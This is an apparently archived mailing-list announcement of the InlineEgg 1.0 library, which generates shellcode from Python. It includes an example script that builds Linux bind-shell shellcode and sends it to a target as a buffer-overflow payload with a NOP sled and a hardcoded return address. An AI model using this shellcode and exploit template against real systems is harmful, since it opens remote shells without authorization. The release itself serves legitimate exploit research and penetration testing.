<<< Date Index >>>     <<< Thread Index >>>

InlineEgg library release



We'd like to share with you the release of InlineEgg 1.0. the following is a reduced version of the README available at http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html,
the same page points to the .tar.gz


Welcome to InlineEgg.

Short version:

InlineEgg is a collection of python classes (a "library"), that will help
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

   InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a pretty
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code execution vulnerabilities (yes, that's what we do part of the time), you usually need to have a small assembly program that will be sent to the vulnerable application as part of
   the exploiting process. Historically, this small pieces of assembly code
   (eggs) were hardcoded as dead strings in the middle of the exploit. But,
although having the strings handy gave the exploit writer some reusability
   and some flexibility, we sometimes needed more, we even needed the
   possiblity of creating our small assembly programs in runtime, and make
them addapt to the situation... well, there are lots of different solutions to the problem, but as I already had some ideas on how to do it, I jumped
   into python.

A simple idea: Do something that lets us create small assembly programs by
   concatenating system calls, giving us the possibility of changing the
   arguments to the system calls, and adding more code when needed...

   [...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

#   egg = InlineEgg(FreeBSDx86Syscall)
#   egg = InlineEgg(OpenBSDx86Syscall)
  egg = InlineEgg(Linuxx86Syscall)

  # bind to port and listen
  sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
sock = egg.save(sock) # save the socket in a variable (in stack) egg.bind(sock, (listen_addr, listen_port)) # sock is now the variable, and it's used from the stack
  egg.listen(sock,1)

  client = egg.accept(sock, 0, 0)
  client = egg.save(client)
  egg.close(sock)

  egg.dup2(client, 0)
  egg.dup2(client, 1)
  egg.dup2(client, 2)
  egg.execve('/bin/sh',('bash','-i'))

  print "Egg len: %d" % len(egg)
  return egg

def main():
  if len(sys.argv) < 3:
     raise Exception, "Usage: %s <target ip> <target port>"

  # connect to target
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((sys.argv[1], int(sys.argv[2])))

  # create egg
  egg = listenShellEgg('0.0.0.0',3334)

  # exploit

  retAddr = struct.pack('<L',0xbffffc24L)
  toSend  = "\x90"*(1024-len(egg))
  toSend += egg.getCode()
  toSend += retAddr*20

  sock.send(toSend)

main()
---------------------------------------------------------

   [...]

InlineEgg: http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

   I hope you find it useful and enjoy it,
   gera